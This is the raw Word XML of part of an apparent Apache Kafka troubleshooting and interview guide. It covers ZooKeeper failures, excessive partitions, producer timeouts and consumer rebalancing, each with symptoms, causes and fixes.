    <w:p w14:paraId="3171A5B7" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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onitor memory usage and profile applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEF2E07" w14:textId="77777777" w:rsidR="000F58AC"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C41D98D">
          <v:rect id="_x0000_i3265" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C5A67F" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC"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8. ZooKeeper Issues (Pre-KRaft Mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A913BF7"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Symptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B646CD" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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Kafka brokers can't register with ZooKeeper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC6F8AC" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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Leadership elections fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3E9BEE"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Causes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF0AAD6" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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ZooKeeper not running or in bad state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD6C87B" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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Network connectivity issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD5F085"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Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3679165A" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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Restart ZooKeeper nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5B543C" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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heck zookeeper.connect configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BB5DF5" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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Use Kafka </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>KRaft mode</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in newer versions (removes ZooKeeper dependency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1069E0" w14:textId="77777777" w:rsidR="000F58AC"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543C786">
          <v:rect id="_x0000_i3266" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BAA98B" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC"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9. Too Many Partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B06F3F0"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Symptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C9321A" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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Broker memory spikes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4593E949" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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Leader elections become slow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56696731" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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Admin operations lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A89C31"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Causes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737CD206" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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isconfiguration or overuse of partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1692224C" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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opics with too many small partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3A89A8"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Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C00040" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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Reevaluate and reduce partition counts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D6416E" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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erge or compact small topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71992347" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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onitor broker partition limits (~4000 per broker is a common threshold).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEB40A0" w14:textId="77777777" w:rsidR="000F58AC"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44A163A">
          <v:rect id="_x0000_i3267" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1AE7E8" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC"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10. Producer Timeout or Retries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793F8871"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Symptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15625D1A" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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roducer fails to send messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799A6045" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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Retry count is high.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326C2F41"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Causes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5D9193" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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Network latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA6A0BF" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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Brokers are slow to acknowledge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4671B267" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D5EC4B" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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Increase request.timeout.ms and delivery.timeout.ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D6A8AD" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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nable retries with backoff.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D11CDDD" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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nable idempotent producer to avoid duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B5901F" w14:textId="68975E0A"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B1AF3D2">
          <v:rect id="_x0000_i3268" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="229D3A62" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="00CE4B95" w:rsidRDefault="00F4512C" w:rsidP="00F4512C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="816" w:name="_Toc196308296"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Kafka’s Consumer Rebalance, and how do you handle it in a large-scale system?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="816"/>
    </w:p>
    <w:p w14:paraId="6136A1B3" w14:textId="1CB62E66" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>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What is Kafka’s Consumer Rebalance?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E6346F"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onsumer Rebalancing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a process in Apache Kafka where </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka reassigns topic partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> among consumers within the same </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25764916" w14:textId="77777777" w:rsidR="00F4512C"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5E04F55">
          <v:rect id="_x0000_i3269" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DEA4C3" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C"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Why Rebalancing Happens:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0963A988"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Rebalancing occurs when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6B6DF8" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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A </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new consumer joins</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67669956" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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An </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>existing consumer leaves</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661554B4" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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ubscribed topics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitions change</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5F5CC6" w14:textId="77777777" w:rsidR="00F4512C"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95078A0">
          <v:rect id="_x0000_i3270" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7476FA88" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C"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What Happens During Rebalance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1376351C" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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All consumers in the group are </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>paused</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E036D5" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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Partitions are </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reassigned</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA4640C" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169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Each consumer </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>drops</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> its current assignment and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>regains</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a new set of partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199ECB98" w14:textId="77777777" w:rsidR="00F4512C"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F3058A2">
          <v:rect id="_x0000_i3271" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF558A3" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C"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Impacts of Frequent Rebalancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E565DED" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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Temporary </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unavailability</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225E188D" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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Performance degradation</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to pausing of consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE0AFB1" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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Possible </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>duplicate processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>offset loss</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
